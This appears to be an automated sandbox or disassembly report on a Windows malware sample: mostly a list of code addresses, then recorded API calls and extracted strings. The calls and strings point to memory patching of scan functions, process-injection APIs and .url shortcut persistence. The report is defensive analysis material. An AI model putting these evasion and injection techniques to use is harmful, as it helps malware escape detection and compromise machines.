0x0286ed81
0x0286ed99
0x0286eda4
0x0286eda5
0x0286edaa
0x0286edaf
0x0286edb5
0x0286edc5
0x0286eddd
0x0286ede8
0x0286edef
0x0286edfa
0x0286ee12
0x0286ee1d
0x0286ee1e
0x0286ee23
0x0286ee28
0x0286ee2e
0x0286ee3e
0x0286ee56
0x0286ee61
0x0286ee68
0x0286ee73
0x0286ee8b
0x0286ee96
0x0286ee97
0x0286eea2
0x0286eea7
0x0286eeb7
0x0286eebc
0x0286eec1
0x0286eec7
0x0286eed7
0x0286eeef
0x0286eefa
0x0286ef01
0x0286ef0c
0x0286ef24
0x0286ef2f
0x0286ef30
0x0286ef35
0x0286ef3a
0x0286ef40
0x0286ef50
0x0286ef68
0x0286ef73
0x0286ef7a
0x0286ef85
0x0286ef9d
0x0286efa8
0x0286efa9
0x0286efae
0x0286efb3
0x0286efb9
0x0286efc9
0x0286efe1
0x0286efec
0x0286eff3
0x0286effe
0x0286f016
0x0286f021
0x0286f022
0x0286f027
0x0286f02c
0x0286f032
0x0286f042
0x0286f05a
0x0286f065
0x0286f06c
0x0286f077
0x0286f08f
0x0286f09a
0x0286f09b
0x0286f0a6
0x0286f0ac
0x0286f0bd
0x0286f0c2
0x0286f0cf
0x0286f0d5
0x0286f0da
0x0286f0df
0x0286f0e5
0x0286f0f5
0x0286f10d
0x0286f118
0x0286f11f
0x0286f12a
0x0286f142
0x0286f14d
0x0286f14e
0x0286f153
0x0286f158
0x0286f15e
0x0286f16e
0x0286f186
0x0286f191
0x0286f198
0x0286f1a3
0x0286f1bb
0x0286f1c6
0x0286f1c7
0x0286f1cc
0x0286f1d1
0x0286f1d7
0x0286f1e7
0x0286f1ff
0x0286f20a
0x0286f211
0x0286f21c
0x0286f234
0x0286f23f
0x0286f240
0x0286f245
0x0286f24a
0x0286f250
0x0286f260
0x0286f278
0x0286f283
0x0286f28a
0x0286f295
0x0286f2ad
0x0286f2b8
0x0286f2b9
0x0286f2c8
0x0286f2d7
0x0286f2e6
0x0286f2f5
0x0286f304
0x0286f313
0x0286f322
0x0286f331
0x0286f340
0x0286f34f
0x0286f35e
0x0286f36d
0x0286f372
0x0286f377
0x0286f37d
0x0286f38d
0x0286f3a5
0x0286f3b0
0x0286f3b7
0x0286f3c2
0x0286f3da
0x0286f3e5
0x0286f3e6
0x0286f3eb
0x0286f3f0
0x0286f3f6
0x0286f406
0x0286f41e
0x0286f429
0x0286f430
0x0286f43b
0x0286f453
0x0286f45e
0x0286f45f
0x0286f464
0x0286f476
0x0286f488
0x0286f48e
0x0286f493
0x0286f499
0x0286f4a9
0x0286f4c1
0x0286f4cc
0x0286f4d3
0x0286f4de
0x0286f4f6
0x0286f501
0x0286f502
0x0286f507
0x0286f50c
0x0286f512
0x0286f522
0x0286f53a
0x0286f545
0x0286f54c
0x0286f557
0x0286f56f
0x0286f57a
0x0286f57b
0x0286f580
0x0286f592
0x0286f59d
0x0286f59d
0x0286f5a2
0x0286f5a7
0x0286f5ad
0x0286f5bd
0x0286f5d5
0x0286f5e0
0x0286f5e7
0x0286f5f2
0x0286f60a
0x0286f615
0x0286f616
0x0286f61b
0x0286f620
0x0286f626
0x0286f636
0x0286f64e
0x0286f659
0x0286f660
0x0286f66b
0x0286f683
0x0286f68e
0x0286f68f
0x0286f694
0x0286f699
0x0286f69f
0x0286f6a7
0x0286f6ac
0x0286f6ac
0x0286f6bd
0x0286f6c2
0x0286f6c7
0x0286f6cc
0x0286f6d2
0x0286f6e2
0x0286f6fa
0x0286f705
0x0286f70c
0x0286f717
0x0286f72f
0x0286f73a
0x0286f73b
0x0286f740
0x0286f745
0x0286f74b
0x0286f75b
0x0286f773
0x0286f77e
0x0286f785
0x0286f790
0x0286f7a8
0x0286f7b3
0x0286f7b4
0x0286f7b9
0x0286f7be
0x0286f7c4
0x0286f7d4
0x0286f7ec
0x0286f7f7
0x0286f7fe
0x0286f809
0x0286f821
0x0286f82c
0x0286f82d
0x0286f832
0x0286f837
0x0286f83d
0x0286f84d
0x0286f865
0x0286f870
0x0286f877
0x0286f882
0x0286f89a
0x0286f8a5
0x0286f8a6
0x0286f8ab
0x0286f8b5
0x0286f8ba
0x028709e7
0x028709e7
0x028709ec
0x028709f2
0x02870a02
0x02870a1a
0x02870a25
0x02870a2c
0x02870a37
0x02870a4f
0x02870a5a
0x02870a5b
0x02870a60
0x02870a65
0x02870a6b
0x02870a7b
0x02870a93
0x02870a9e
0x02870aa5
0x02870ab0
0x02870ac8
0x02870ad3
0x02870ad4
0x02870adf
0x02870ae5
0x02870aea
0x02870afa
0x02870aff
0x02870b04
0x02870b0a
0x02870b1a
0x02870b32
0x02870b3d
0x02870b44
0x02870b4f
0x02870b67
0x02870b72
0x02870b73
0x02870b78
0x02870b7d
0x02870b83
0x02870b93
0x02870bab
0x02870bb6
0x02870bbd
0x02870bc8
0x02870be0
0x02870beb
0x02870bec
0x02870bf1
0x02870bf6
0x02870bfc
0x02870c0c
0x02870c24
0x02870c2f
0x02870c36
0x02870c41
0x02870c59
0x02870c64
0x02870c65
0x02870c6a
0x02870c6f
0x02870c7c
0x02870c81
0x02870c91
0x02870c96
0x02870c9b
0x02870ca1
0x02870cb1
0x02870cc9
0x02870cd4
0x02870cdb
0x02870ce6
0x02870cfe
0x02870d09
0x02870d0a
0x02870d0f
0x02870d14
0x02870d1a
0x02870d2a
0x02870d42
0x02870d4d
0x02870d54
0x02870d5f
0x02870d77
0x02870d82
0x02870d83
0x02870d88
0x02870d8d
0x02870d93
0x02870da3
0x02870dbb
0x02870dc6
0x02870dcd
0x02870dd8
0x02870df0
0x02870dfb
0x02870dfc
0x02870e07
0x02870e0c
0x02870e1d
0x02870e2d
0x02870e32
0x02870e37
0x02870e3d
0x02870e4d
0x02870e65
0x02870e70
0x02870e77
0x02870e82
0x02870e9a
0x02870ea5
0x02870ea6
0x02870eab
0x02870eb0
0x02870eb6
0x02870ec6
0x02870ede
0x02870ee9
0x02870ef0
0x02870efb
0x02870f13
0x02870f1e
0x02870f1f
0x02870f24
0x02870f29
0x02870f2f
0x02870f3f
0x02870f57
0x02870f62
0x02870f69
0x02870f74
0x02870f8c
0x02870f97
0x02870f98
0x02870f9d
0x02870fa7
0x02870fac
0x0287297f
0x0287297f
0x02872984
0x0287298a
0x0287299a
0x028729b2
0x028729bd
0x028729c4
0x028729cf
0x028729e7
0x028729f2
0x028729f3
0x028729f8
0x028729fd
0x02872a03
0x02872a13
0x02872a2b
0x02872a36
0x02872a3d
0x02872a48
0x02872a60
0x02872a6b
0x02872a6c
0x02872a71
0x02872a76
0x02872a7c
0x02872a8c
0x02872aa4
0x02872aaf
0x02872ab6
0x02872ac1
0x02872ad9
0x02872ae4
0x02872ae5
0x02872aea
0x02872af4
0x02872af9
0x02873404
0x02873404
0x02873409
0x0287340f
0x0287341f
0x02873437
0x02873442
0x02873449
0x02873454
0x0287346c
0x02873477
0x02873478
0x0287347d
0x02873482
0x02873488
0x02873498
0x028734b0
0x028734bb
0x028734c2
0x028734cd
0x028734e5
0x028734f0
0x028734f1
0x028734f6
0x028734fb
0x02873501
0x02873511
0x02873529
0x02873534
0x0287353b
0x02873546
0x0287355e
0x02873569
0x0287356a
0x0287356f
0x02873579
0x0287357e
0x02873584
0x0287358e
0x02873593
0x02873599
0x0287359e
0x028735a4
0x028735b4
0x028735cc
0x028735d7
0x028735de
0x028735e9
0x02873601
0x0287360c
0x0287360d
0x02873612
0x02873617
0x0287361d
0x0287362d
0x02873645
0x02873650
0x02873657
0x02873662
0x0287367a
0x02873685
0x02873686
0x0287368b
0x02873690
0x02873696
0x028736a6
0x028736be
0x028736c9
0x028736d0
0x028736db
0x028736f3
0x028736fe
0x028736ff
0x02873704
0x0287370a
0x02873715
0x0287371a
0x0287371f
0x02873725
0x0287372a
0x0287372c
0x02873731
0x02873733
0x02873743
0x0287375a
0x0287375f
0x02873764
0x0287376a
0x0287377a
0x02873792
0x0287379d
0x028737a4
0x028737af
0x028737c7
0x028737d2
0x028737d3
0x028737d8
0x028737dd
0x028737e3
0x028737f3
0x0287380b
0x02873816
0x0287381d
0x02873828
0x02873840
0x0287384b
0x0287384c
0x02873851
0x02873856
0x0287385b
0x0287385d
0x02873863
0x02873868
0x0287386e
0x0287387e
0x02873896
0x028738a1
0x028738a8
0x028738b3
0x028738cb
0x028738d6
0x028738d7
0x028738dc
0x028738e1
0x028738e7
0x028738f7
0x0287390f
0x0287391a
0x02873921
0x0287392c
0x02873944
0x0287394f
0x02873950
0x02873965
0x02873975
0x0287397a
0x0287397f
0x02873985
0x02873995
0x028739ad
0x028739b8
0x028739bf
0x028739ca
0x028739e2
0x028739ed
0x028739ee
0x028739f3
0x028739f8
0x028739fe
0x02873a0e
0x02873a26
0x02873a31
0x02873a38
0x02873a43
0x02873a5b
0x02873a66
0x02873a67
0x02873a72
0x02873a78
0x02873a83
0x02873a8a
0x02873a90
0x02873aa1
0x02873aac
0x02873aad
0x02873aad
0x02873ab2
0x02873ab7
0x02873abd
0x02873acd
0x02873ae5
0x02873af0
0x02873af7
0x02873b02
0x02873b1a
0x02873b25
0x02873b26
0x02873b2b
0x02873b30
0x02873b36
0x02873b46
0x02873b5e
0x02873b69
0x02873b70
0x02873b7b
0x02873b93
0x02873b9e
0x02873b9f
0x02873ba4
0x02873ba9
0x02873baf
0x02873bbf
0x02873bd7
0x02873be2
0x02873be9
0x02873bf4
0x02873c0c
0x02873c17
0x02873c18
0x02873c27
0x02873c28
0x02873c3a
0x02873c45
0x02873c46
0x02873c46
0x02873593
0x02873c4b
0x02873c50
0x02873c56
0x02873c66
0x02873c7e
0x02873c89
0x02873c90
0x02873c9b
0x02873cb3
0x02873cbe
0x02873cbf
0x02873cc4
0x02873cc9
0x02873ccf
0x02873cdf
0x02873cf7
0x02873d02
0x02873d09
0x02873d14
0x02873d2c
0x02873d37
0x02873d38
0x02873d48
0x02873d53
0x02873d5f
0x02873d6a
0x02873d6b
0x02873d70
0x02873d75
0x02873d7b
0x02873d8b
0x02873da3
0x02873dae
0x02873db5
0x02873dc0
0x02873dd8
0x02873de3
0x02873de4
0x02873de9
0x02873dee
0x02873df4
0x02873e04
0x02873e1c
0x02873e27
0x02873e2e
0x02873e39
0x02873e51
0x02873e5c
0x02873e5d
0x02873e62
0x02873e67
0x02873e6d
0x02873e7d
0x02873e95
0x02873ea0
0x02873ea7
0x02873eb2
0x02873eca
0x02873ed5
0x02873ed6
0x02873ee6
0x02873ef1
0x02873efd
0x02873f08
0x02873f09
0x02873f19
0x02873f24
0x02873f30
0x02873f3b
0x02873f3c
0x02873f4c
0x02873f57
0x02873f63
0x02873f6e
0x02873f6f
0x02873f7f
0x02873f8a
0x02873f96
0x02873fa1
0x02873fa2
0x02873fb2
0x02873fbd
0x02873fc9
0x02873fd4
0x02873fd5
0x02873fe5
0x02873ff0
0x02873ffc
0x02874007
0x02874008
0x02874018
0x02874023
0x0287402f
0x0287403a
0x0287403b
0x0287404b
0x02874056
0x02874062
0x0287406d
0x0287406e
0x0287407e
0x02874089
0x02874095
0x028740a0
0x028740a1
0x028740b0
0x028740bf
0x028740ce
0x028740dd
0x028740ec
0x028740fb
0x0287410a
0x02874119
0x02874128
0x02874137
0x02874146
0x02874155
0x02874164
0x02874173
0x02874182
0x02874191
0x02874196
0x0287419b
0x028741a1
0x028741b1
0x028741c9
0x028741d4
0x028741db
0x028741e6
0x028741fe
0x02874209
0x0287420a
0x0287420f
0x02874214
0x0287421a
0x0287422a
0x02874242
0x0287424d
0x02874254
0x0287425f
0x02874277
0x02874282
0x02874283
0x02874288
0x0287428d
0x02874293
0x028742a3
0x028742bb
0x028742c6
0x028742cd
0x028742d8
0x028742f0
0x028742fb
0x028742fc
0x0287430c
0x02874317
0x02874323
0x0287432e
0x0287432f
0x0287433f
0x0287434a
0x02874356
0x02874361
0x02874362
0x02874372
0x0287437d
0x02874389
0x02874394
0x02874395
0x028743a5
0x028743b0
0x028743bc
0x028743c7
0x028743c8
0x028743d8
0x028743e3
0x028743ef
0x028743fa
0x028743fb
0x0287440b
0x02874416
0x02874422
0x0287442d
0x0287442e
0x0287443e
0x02874449
0x02874455
0x02874460
0x02874461
0x02874471
0x0287447c
0x02874488
0x02874493
0x02874494
0x028744a4
0x028744af
0x028744bb
0x028744c6
0x028744c7
0x028744d7
0x028744e2
0x028744ee
0x028744f9
0x028744fa
0x0287450a
0x02874515
0x02874521
0x0287452c
0x0287452d
0x0287453d
0x02874548
0x02874554
0x0287455f
0x02874560
0x02874570
0x0287457b
0x02874587
0x02874592
0x02874593
0x028745a3
0x028745ae
0x028745ba
0x028745c5
0x028745c6
0x028745d6
0x028745e1
0x028745ed
0x028745f8
0x028745f9
0x02874609
0x02874614
0x02874620
0x0287462b
0x0287462c
0x0287463c
0x02874647
0x02874653
0x0287465e
0x0287465f
0x0287466f
0x0287467a
0x02874686
0x02874691
0x02874692
0x028746a2
0x028746ad
0x028746b9
0x028746c4
0x028746c5
0x028746d5
0x028746e0
0x028746ec
0x028746f7
0x028746f8
0x02874708
0x02874713
0x0287471f
0x0287472a
0x0287472b
0x0287473b
0x02874746
0x02874752
0x0287475d
0x0287475e
0x02874763
0x02874768
0x0287476e
0x0287477e
0x02874796
0x028747a1
0x028747a8
0x028747b3
0x028747cb
0x028747d6
0x028747d7
0x028747dc
0x028747e1
0x028747e7
0x028747f7
0x0287480f
0x0287481a
0x02874821
0x0287482c
0x02874844
0x0287484f
0x02874850
0x02874855
0x0287485a
0x02874860
0x02874870
0x02874888
0x02874893
0x0287489a
0x028748a5
0x028748bd
0x028748c8
0x028748c9
0x028748dd
0x028748e4
0x00000000
0x02872aff
0x02872aff
0x02872b09
0x02872b0e
0x00000000
0x02872b14
0x02872b14
0x02872b19
0x02872b1f
0x02872b2f
0x02872b47
0x02872b52
0x02872b59
0x02872b64
0x02872b7c
0x02872b87
0x02872b88
0x02872b8d
0x02872b92
0x02872b98
0x02872ba8
0x02872bc0
0x02872bcb
0x02872bd2
0x02872bdd
0x02872bf5
0x02872c00
0x02872c01
0x02872c06
0x02872c0b
0x02872c11
0x02872c21
0x02872c39
0x02872c44
0x02872c4b
0x02872c56
0x02872c6e
0x02872c79
0x02872c7a
0x02872c7f
0x02872c84
0x02872c8a
0x02872c9a
0x02872cb2
0x02872cbd
0x02872cc4
0x02872ccf
0x02872ce7
0x02872cf2
0x02872cf3
0x02872d00
0x02872d0b
0x02872d1c
0x02872d21
0x02872d26
0x02872d2c
0x02872d3c
0x02872d54
0x02872d5f
0x02872d66
0x02872d71
0x02872d89
0x02872d94
0x02872d95
0x02872d9a
0x02872dac
0x02872dbc
0x02872dc1
0x02872dc6
0x02872dcc
0x02872ddc
0x02872df4
0x02872dff
0x02872e06
0x02872e11
0x02872e29
0x02872e34
0x02872e35
0x02872e3a
0x02872e3f
0x02872e45
0x02872e55
0x02872e6d
0x02872e78
0x02872e7f
0x02872e8a
0x02872ea2
0x02872ead
0x02872eae
0x02872eb3
0x02872eb8
0x02872ebe
0x02872ece
0x02872ee6
0x02872ef1
0x02872ef8
0x02872f03
0x02872f1b
0x02872f26
0x02872f27
0x02872f38
0x02872f3f
0x02872f40
0x02872f45
0x02872f48
0x02872f4b
0x02872f50
0x02872f56
0x02872f66
0x02872f7e
0x02872f89
0x02872f90
0x02872f9b
0x02872fb3
0x02872fbe
0x02872fbf
0x02872fc4
0x02872fc9
0x02872fcf
0x02872fdf
0x02872ff7
0x02873002
0x02873009
0x02873014
0x0287302c
0x02873037
0x02873038
0x0287303d
0x02873042
0x02873048
0x0287304e
0x02873050
0x02873052
0x02873052
0x02873055
0x02873055
0x02873059
0x0287305c
0x02873061
0x02873066
0x0287306b
0x02873071
0x02873081
0x02873099
0x028730a4
0x028730ab
0x028730b6
0x028730ce
0x028730d9
0x028730da
0x028730df
0x028730e4
0x028730ea
0x028730fa
0x02873112
0x0287311d
0x02873124
0x0287312f
0x02873147
0x02873152
0x02873153
0x02873158
0x0287315f
0x02873167
0x0287316d
0x02873172
0x02873177
0x0287317c
0x02873182
0x02873192
0x028731aa
0x028731b5
0x028731bc
0x028731c7
0x028731df
0x028731ea
0x028731eb
0x028731f0
0x028731f5
0x028731fb
0x0287320b
0x02873223
0x0287322e
0x02873235
0x02873240
0x02873258
0x02873263
0x02873264
0x02873269
0x0287326e
0x02873274
0x02873284
0x0287329c
0x028732a7
0x028732ae
0x028732b9
0x028732d1
0x028732dc
0x028732dd
0x028732e2
0x028732e8
0x028732ee
0x028732f3
0x028732f5
0x028732f8
0x028732fb
0x02873300
0x0287330a
0x0287330a
0x02872b0e
0x02870fb2
0x02870fb2
0x02870fb8
0x02870fbd
0x02870fc2
0x02870fc4
0x02870fc6
0x02870fc8
0x02870fca
0x02870fcc
0x02870fd1
0x02870fd3
0x02870fd5
0x02870fd7
0x02870fd9
0x02870fdb
0x02870feb
0x02871003
0x0287100e
0x02871013
0x02871015
0x00000000
0x0287101b
0x0287101b
0x02871020
0x02871026
0x02871036
0x0287104e
0x02871059
0x02871060
0x0287106b
0x02871083
0x0287108e
0x0287108f
0x0287109f
0x028710aa
0x028710af
0x028710b1
0x00000000
0x028710b7
0x028710b7
0x028710bc
0x028710c2
0x028710d2
0x028710ea
0x028710f5
0x028710fc
0x02871107
0x0287111f
0x0287112a
0x0287112b
0x02871130
0x02871135
0x0287113b
0x0287114b
0x02871163
0x0287116e
0x02871175
0x02871180
0x02871198
0x028711a3
0x028711a4
0x028711a9
0x028711ae
0x028711b4
0x028711c4
0x028711dc
0x028711e7
0x028711ee
0x028711f9
0x02871211
0x0287121c
0x0287121d
0x0287122e
0x0287123e
0x02871246
0x02871252
0x0287125d
0x02871264
0x02871267
0x0287126c
0x02871272
0x02871277
0x02871279
0x0287127b
0x0287127d
0x0287127f
0x02871281
0x02871283
0x02871285
0x0287128a
0x0287128c
0x0287128e
0x02871290
0x02871292
0x02871294
0x02871296
0x02871298
0x028712a8
0x028712c0
0x028712cb
0x028712d2
0x028712dd
0x028712f5
0x02871300
0x02871301
0x02871347
0x0287135f
0x0287136a
0x02871371
0x02871374
0x02871376
0x02871379
0x0287137c
0x02871381
0x0287138b
0x0287138b
0x028710b1
0x02871015
0x0286f8c0
0x0286f8c0
0x0286f8c5
0x0286f8cb
0x0286f8db
0x0286f8f3
0x0286f905
0x00000000
0x0286f90b
0x0286f90b
0x0286f910
0x0286f916
0x0286f926
0x0286f93e
0x0286f949
0x0286f950
0x0286f95b
0x0286f973
0x0286f97e
0x0286f97f
0x0286f984
0x0286f989
0x0286f98f
0x0286f99f
0x0286f9b7
0x0286f9c2
0x0286f9c9
0x0286f9d4
0x0286f9ec
0x0286f9f7
0x0286f9f8
0x0286f9fd
0x0286fa02
0x0286fa08
0x0286fa18
0x0286fa30
0x0286fa3b
0x0286fa42
0x0286fa4d
0x0286fa65
0x0286fa70
0x0286fa71
0x0286fa76
0x0286fa7c
0x0286fa81
0x0286fa92
0x0286faa9
0x0286faae
0x0286fab3
0x0286fab9
0x0286fac9
0x0286fae1
0x0286faec
0x0286faf3
0x0286fafe
0x0286fb16
0x0286fb21
0x0286fb22
0x0286fb27
0x0286fb2c
0x0286fb32
0x0286fb42
0x0286fb5a
0x0286fb65
0x0286fb6c
0x0286fb77
0x0286fb8f
0x0286fb9a
0x0286fb9b
0x0286fba0
0x0286fba5
0x0286fbab
0x0286fbbb
0x0286fbd3
0x0286fbde
0x0286fbe5
0x0286fbf0
0x0286fc08
0x0286fc13
0x0286fc14
0x0286fc19
0x0286fc1e
0x0286fc24
0x0286fc34
0x0286fc4c
0x0286fc57
0x0286fc5e
0x0286fc69
0x0286fc81
0x0286fc8c
0x0286fc8d
0x0286fc92
0x0286fc97
0x0286fc9d
0x0286fcad
0x0286fcc5
0x0286fcd0
0x0286fcd7
0x0286fce2
0x0286fcfa
0x0286fd05
0x0286fd06
0x0286fd0b
0x0286fd10
0x0286fd16
0x0286fd1b
0x0286fd1d
0x0286fd1f
0x0286fd21
0x0286fd23
0x0286fd28
0x0286fd2a
0x0286fd2c
0x0286fd2e
0x0286fd30
0x0286fd40
0x0286fd57
0x0286fd5c
0x0286fd61
0x0286fd67
0x0286fd77
0x0286fd8f
0x0286fd9a
0x0286fda1
0x0286fdac
0x0286fdc4
0x0286fdcf
0x0286fdd0
0x0286fdd5
0x0286fdda
0x0286fde0
0x0286fdf0
0x0286fe08
0x0286fe13
0x0286fe1a
0x0286fe25
0x0286fe3d
0x0286fe48
0x0286fe49
0x0286fe4e
0x0286fe53
0x0286fe59
0x0286fe69
0x0286fe81
0x0286fe8c
0x0286fe93
0x0286fe9e
0x0286feb6
0x0286fec1
0x0286fec2
0x0286fec7
0x0286fecc
0x0286fed2
0x0286fee2
0x0286fefa
0x0286ff05
0x0286ff0c
0x0286ff17
0x0286ff2f
0x0286ff3a
0x0286ff3b
0x0286ff40
0x0286ff45
0x0286ff4b
0x0286ff5b
0x0286ff73
0x0286ff7e
0x0286ff85
0x0286ff90
0x0286ffa8
0x0286ffb3
0x0286ffb4
0x0286ffbf
0x0286ffc5
0x0286ffd0
0x0286ffd7
0x0286ffdd
0x0286ffee
0x0286fff9
0x0286fffa
0x0286ffff
0x02870004
0x0287000a
0x0287001a
0x02870032
0x0287003d
0x02870044
0x0287004f
0x02870067
0x02870072
0x02870073
0x02870078
0x0287007d
0x02870083
0x02870093
0x028700ab
0x028700b6
0x028700bd
0x028700c8
0x028700e0
0x028700eb
0x028700ec
0x028700f1
0x028700f6
0x028700fc
0x0287010c
0x02870124
0x0287012f
0x02870136
0x02870141
0x02870159
0x02870164
0x02870165
0x0287016a
0x0287016f
0x02870175
0x02870185
0x0287019d
0x028701a8
0x028701af
0x028701ba
0x028701d2
0x028701dd
0x028701de
0x028701e3
0x028701e8
0x028701ee
0x028701fe
0x02870216
0x02870221
0x02870228
0x02870233
0x0287024b
0x02870256
0x02870257
0x0287025c
0x02870261
0x02870267
0x02870277
0x0287028f
0x0287029a
0x028702a1
0x028702ac
0x028702c4
0x028702cf
0x028702d0
0x028702e1
0x028702e8
0x028702e9
0x028702ee
0x028702f1
0x028702f4
0x028702f9
0x028702ff
0x0287030f
0x02870327
0x02870332
0x02870339
0x02870344
0x0287035c
0x02870367
0x02870368
0x0287036d
0x02870372
0x02870378
0x02870388
0x028703a0
0x028703ab
0x028703b2
0x028703bd
0x028703d5
0x028703e0
0x028703e1
0x028703eb
0x028703f2
0x02870410
0x0287041b
0x02870422
0x0287042a
0x02870438
0x0287044e
0x02870459
0x02870460
0x02870463
0x02870468
0x0287046e
0x0287047e
0x02870496
0x028704a1
0x028704a8
0x028704b3
0x028704cb
0x028704d6
0x028704d7
0x028704dc
0x028704e1
0x028704e7
0x028704f7
0x0287050f
0x0287051a
0x02870521
0x0287052c
0x02870544
0x0287054f
0x02870550
0x0287055a
0x02870566
0x0287057c
0x02870587
0x0287058e
0x02870591
0x02870596
0x0287059c
0x028705ac
0x028705c4
0x028705cf
0x028705d6
0x028705e1
0x028705f9
0x02870604
0x02870605
0x0287060a
0x0287060f
0x02870615
0x02870625
0x0287063d
0x02870648
0x0287064f
0x0287065a
0x02870672
0x0287067d
0x0287067e
0x028706b8
0x028706d0
0x028706db
0x028706e2
0x028706e7
0x028706ea
0x028706ed
0x028706f2
0x028706fc
0x028706fc
0x0286f905
0x0286f8ba

APIs

InetIsOffline.URL(000008AE,00000000,02874C19,?,?,00000000,00000000), ref: 0286C958

Part of subcall function 02867B80: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02867C5B), ref: 02867BB8
Part of subcall function 02867B80: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BC6
Part of subcall function 02867B80: GetProcAddress.KERNEL32(6CFE0000,00000000), ref: 02867BDF
Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BFA
Part of subcall function 02867B80: VirtualProtectEx.KERNEL32(00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867C00
Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02867C2A
Part of subcall function 02867B80: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000), ref: 02867C30
Part of subcall function 02867B80: FreeLibrary.KERNEL32(6CFE0000,00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000), ref: 02867C3B

Part of subcall function 02852EE0: QueryPerformanceCounter.KERNEL32 ref: 02852EE4

Part of subcall function 02857E40: GetFileAttributesA.KERNEL32(00000000,028A65D4,0286CCD6,ScanString,02874C4C,ScanBuffer,02874C4C,UacInitialize,02874C4C,UacScan,02874C4C,ScanBuffer,02874C4C,Initialize,02874C4C,ScanString), ref: 02857E4B

Part of subcall function 02857E64: GetFileAttributesA.KERNEL32(00000000,028A65D4,0286F486,ScanString,02874C4C,OpenSession,02874C4C,ScanBuffer,02874C4C,OpenSession,02874C4C,ScanString,02874C4C,Initialize,02874C4C,ScanBuffer), ref: 02857E6F

Part of subcall function 0285802C: CreateDirectoryA.KERNEL32(00000000,00000000,028A65D4,0286F5A2,ScanBuffer,02874C4C,Initialize,02874C4C,ScanString,02874C4C,OpenSession,02874C4C,ScanBuffer,02874C4C,OpenSession,02874C4C), ref: 02858039

Part of subcall function 0286BCF4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286BDC6), ref: 0286BD33
Part of subcall function 0286BCF4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0286BD6D
Part of subcall function 0286BCF4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0286BD9A
Part of subcall function 0286BCF4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0286BDA3

Strings

NtQueryVirtualMemory, xrefs: 0287449F
DlpGetArchiveFileTraceInfo, xrefs: 02873F47
C:\Users\Public\Libraries, xrefs: 0286CFFA
psapi, xrefs: 02874123
connect, xrefs: 02874178
^^Nc, xrefs: 0286DA79
DlpGetWebSiteAccess, xrefs: 02873F7A
NtMapViewOfSection, xrefs: 0287456B
VirtualAlloc, xrefs: 02874307
NtCreateSection, xrefs: 02874538
NtWriteVirtualMemory, xrefs: 0287469D
VirtualProtect, xrefs: 0287436D
NtAccessCheck, xrefs: 02874604
http, xrefs: 0286E11C
can, xrefs: 02871298
IconIndex=, xrefs: 02870449
NtOpenSection, xrefs: 02874505
.url, xrefs: 0286F8CB
tig, xrefs: 0286F0A6
CreateProcessAsUserW, xrefs: 0287415A, 02874187
RtlCreateQueryDebugBuffer, xrefs: 02874079
WinHttp.WinHttpRequest.5.1, xrefs: 0286E324
SetUnhandledExceptionFilter, xrefs: 02874439
[InternetShortcut], xrefs: 028703E6
CreateProcessWithLogonW, xrefs: 02874169
C:\Windows\SysWOW64, xrefs: 0287109A
kernel32, xrefs: 0287431E, 02874351, 02874384, 028743B7, 028743EA, 0287441D, 02874450
ntdll, xrefs: 02873FC4, 02873FF7, 0287402A, 0287405D, 02874090, 02874483, 028744B6, 028744E9, 0287451C, 0287454F, 02874582, 028745B5, 028745E8, 0287461B, 0287464E, 02874681, 028746B4, 028746E7, 0287471A, 0287474D, 028748D8
NtQuerySystemInformation, xrefs: 028740A6
DlpNotifyPreDragDrop, xrefs: 02873EE1
FlushInstructionCache, xrefs: 02874406
NtQuerySecurityObject, xrefs: 028745D1
Kernel32, xrefs: 02874132, 02874141, 0287418C
EnumServicesStatusA, xrefs: 028740E2
NtQueryInformationThread, xrefs: 028744D2
NtDeviceIoControlFile, xrefs: 028740B5
Advapi, xrefs: 028740E7, 028740F6, 02874105, 02874114, 02874150, 0287415F, 0287416E
OpenSession, xrefs: 0286C98C, 0286D101, 0286D21D, 0286D401, 0286D47A, 0286D5F7, 0286D762, 0286D868, 0286D98C, 0286DC2F, 0286DE51, 0286DF43, 0286E1B7, 0286E237, 0286E349, 0286E45B, 0286E561, 0286E793, 0286E99C, 0286EBA5, 0286EDB5, 0286EFB9, 0286F1D7, 0286F37D, 0286F5AD, 0286F6D2, 0286F7C4, 0286FA08, 0286FAB9, 0286FC24, 0286FF4B, 0287000A, 028700FC, 028702FF, 0287046E, 02870615, 028709F2, 02870B83, 02870D1A, 02870EB6, 0287113B, 0287298A, 02872B1F, 02872C11, 02872DCC, 02872EBE, 02872FCF, 028730EA, 028731FB, 0287361D, 028737E3, 02873BAF, 02873D7B, 0287421A, 02874860
UacInitialize, xrefs: 0286CB76, 0286CF0E, 0286F916, 02872A03, 028741A1
NtReadVirtualMemory, xrefs: 0287459E
UacScan, xrefs: 0286CB15, 0286CE1C, 0286D7E0, 0286DFBC, 0286E2B0, 0286E91E, 0286FD67, 028735A4, 028738E7, 02873985
acS, xrefs: 02871285
WriteVirtualMemory, xrefs: 028743D3
CreateProcessW, xrefs: 0287413C
HotKey=, xrefs: 02870577
RtlAllocateHeap, xrefs: 02873FE0, 02874046
